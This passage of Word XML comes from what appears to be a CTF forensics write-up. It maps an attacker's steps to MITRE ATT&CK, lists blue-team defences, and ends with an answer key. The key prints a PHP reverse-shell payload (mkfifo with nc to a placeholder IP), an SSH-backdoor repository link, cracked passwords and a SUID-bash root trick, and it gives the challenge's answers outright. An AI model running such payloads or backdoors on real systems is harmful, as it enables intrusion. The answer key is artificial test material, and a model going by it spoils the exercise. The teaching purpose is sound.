              <w:t xml:space="preserve">Reading local config files and /etc/shadow in clear text over the shell</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2800"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">T1552 / T1003.008 – Unsecured Credentials / OS Credential Dumping</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2400"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Persistence</w:t>
            </w:r>
          </w:p>
        </w:tc>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Building and running a third-party Go SSH backdoor on a non-standard port</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2800"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">T1505 / T1136 – Server Software Component / Backdoor</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2400"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Privilege Escalation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4200"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Leaving a SUID root bash binary for repeatable root access</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2800"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">T1548.001 – Abuse Elevation Control Mechanism: Setuid/Setgid</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2400"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Impact</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4200"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Website defacement</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2800"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">T1491.001 – Defacement: Internal Defacement</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="1F4E79" w:sz="8" w:space="4"/>
        </w:pBdr>
        <w:spacing w:after="160" w:before="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F4E79"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve">7. Defensive Recommendations (Blue-Team Perspective)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Every offensive step above has a straightforward corresponding control. Framing them side-by-side is the core habit of good CTF write-ups and real security assessments:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Remove or properly authenticate hidden/dev endpoints; never leave staging pages reachable without auth in production.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Validate file uploads by content, not extension: block or re-encode uploads, store them outside the web root, and disable script execution (e.g. php_admin_flag engine off) in upload directories.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Never transmit shells or admin sessions in clear text — use encrypted channels (SSH, TLS) and treat any successful plain HTTP RCE as a full compromise requiring shadow-file rotation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Store credentials using strong, modern hashing (bcrypt/argon2/scrypt) with per-user random salts, and enforce password complexity/rotation to make offline cracking impractical.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Monitor for unexpected listening ports and unknown SSH-like banners; a second SSH-looking service on a non-standard port is a strong persistence indicator.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Periodically audit for SUID/SGID binaries that don't belong: find / -perm -4000 -type f 2&gt;/dev/null.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Deploy file-integrity monitoring on public web content to catch defacement immediately.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Ensure full-packet capture / EDR telemetry exists before an incident — this entire investigation was only possible because paradox had already captured the traffic.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="1F4E79" w:sz="8" w:space="4"/>
        </w:pBdr>
        <w:spacing w:after="160" w:before="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F4E79"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve">8. Answer Key — Quick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300"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="700"/>
            <w:shd w:fill="1F4E79" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">#</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4400"/>
            <w:shd w:fill="1F4E79" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Question</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4300"/>
            <w:shd w:fill="1F4E79" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Answer</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1</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Upload URL used for the reverse shell</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/development/</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="700"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4400"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Reverse-shell payload</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4300"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">&lt;?php exec("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2&gt;&amp;1|nc &lt;IP&gt; 4242 &gt;/tmp/f")?&gt;</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3</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Privilege-escalation password (to james)</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whenevernoteartinstant</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="700"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4400"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Persistence mechanism</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4300"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">https://github.com/NinjaJc01/ssh-backdoor</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5</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Crackable passwords (fasttrack wordlist)</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4</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="700"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4400"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Backdoor's default hard-coded hash</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4300"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">bdd04d9b...fc2170e3 (SHA-512, see §4.1)</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7</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Backdoor's hard-coded salt</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1c362db832f3f864c8c2fe05f2002a05</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="700"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4400"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Hash the attacker actually used</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4300"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">6d05358f...c565401929 (see §4.2)</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9</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Cracked backdoor password</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november16</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="700"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4400"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Website defacement heading</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4300"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">H4ck3d by CooctusClan</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="700"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">11</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4400"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Privilege-escalation vector to root</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4300"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">SUID bash binary (.suid_bash -p)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
